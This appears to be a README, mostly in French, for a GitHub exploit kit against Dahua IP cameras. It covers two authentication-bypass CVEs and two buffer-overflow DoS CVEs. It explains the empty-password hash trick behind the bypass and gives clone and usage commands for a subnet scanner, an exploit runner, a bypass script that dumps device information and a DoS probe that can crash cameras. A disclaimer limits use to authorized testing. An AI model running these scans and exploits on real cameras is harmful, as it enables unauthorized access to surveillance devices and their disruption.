
Kit de recherche sur les CVE des caméras IP Dahua (CVE-2021-33044/33045, CVE-2025-31700/31701)
⚠️ EN COURS DE DÉVELOPPEMENT — Ces scripts sont basés sur les détails publiés des CVE et nécessitent des tests supplémentaires sur des appareils vulnérables pour confirmer leur pleine fonctionnalité.
Scripts de recherche et de preuve de concept pour quatre vulnérabilités critiques des caméras IP Dahua.
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.
By using these tools, you agree that:
1. You have EXPLICIT WRITTEN AUTHORIZATION to test the target systems
2. You will NOT use these tools for illegal activities
3. You accept full responsibility for your actions
4. The authors are NOT liable for any misuse or damage
Unauthorized access to computer systems is a CRIMINAL OFFENSE in most jurisdictions.
| CVE | CVSS | Type | Statut |
|---|---|---|---|
| CVE-2021-33044 | 9.8 CRITIQUE | Contournement d'authentification | CISA KEV (activement exploitée) |
| CVE-2021-33045 | 9.8 CRITIQUE | Contournement d'authentification | CISA KEV (activement exploitée) |
| CVE-2025-31700 | 8.1 ÉLEVÉE | Dépassement de tampon DoS | Récente (2025) |
| CVE-2025-31701 | 8.1 ÉLEVÉE | Dépassement de tampon DoS | Récente (2025) |
Les caméras Dahua utilisent une authentification par défi-réponse via /RPC2_Login :
Normal Login:
step1 = MD5("admin:realm:PASSWORD")
step2 = MD5("step1:random:step1")
Bypass (CVE-2021-33044/45):
step1 = MD5("admin:realm:") ← EMPTY password
step2 = MD5("step1:random:step1")
Le firmware vulnérable accepte le hash de mot de passe vide et renvoie un jeton de session valide.
# Clone repository
git clone https://github.com/umair-aziz025/Dahua_IP_Camera_CVE_Exploit.git
cd Dahua_IP_Camera_CVE_Exploit
# Install dependencies
pip install requests
# Scan subnet (ports required)
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081
# Single host with port
python dahua_scanner.py 192.168.1.100:8081
# Full options
python dahua_scanner.py 192.168.1.0/24 -p 80 8080 -w 100 -t 10 -v -o results.json
# Show help
python dahua_scanner.py --help
Ports Dahua courants : 80, 8000, 8080, 8081, 8888, 9000, 443, 37777
python dahua_exploit.py 192.168.1.100 -p 8081
python dahua_exploit.py 192.168.1.100 -c 2021-33044 # Single CVE
python dahua_exploit.py --help
python dahua_auth_bypass.py 192.168.1.100 -p 8081
python dahua_auth_bypass.py 192.168.1.100 --dump # Dump device info after bypass
python dahua_rce.py 192.168.1.100 -p 8081
python dahua_rce.py 192.168.1.100 --cve http # HTTP only
python dahua_rce.py 192.168.1.100 --cve tcp # TCP/37777 only
⚠️ AVERTISSEMENT : Le script DoS peut faire planter l'appareil cible.
requests
Toutes les autres importations proviennent de la bibliothèque standard de Python :
socket, struct, hashlib, threading, ipaddress, argparse, json
🚧 EN COURS DE DÉVELOPPEMENT ACTIF
Ces scripts ont été développés sur la base de :
État des tests :
Si vous avez accès à des appareils vulnérables pour les tests, les contributions et les retours sont les bienvenus.
Veuillez signaler tout problème ou faux positif.
Licence MIT — Voir le fichier LICENSE.
Umair Aziz
GitHub : @umair-aziz025
Pour la recherche éducative et les tests de sécurité autorisés uniquement.
| Fichier | Objectif | CVE |
|---|
dahua_scanner.py | Découverte réseau — trouver les caméras Dahua sur le sous-réseau | Détection |
dahua_exploit.py | Scanner multi-CVE — tester toutes les vulnérabilités | Toutes |
dahua_auth_bypass.py | Contournement d'authentification dédié avec option --dump | CVE-2021-33044/45 |
dahua_rce.py | Sonde DoS par dépassement de tampon | CVE-2025-31700/01 |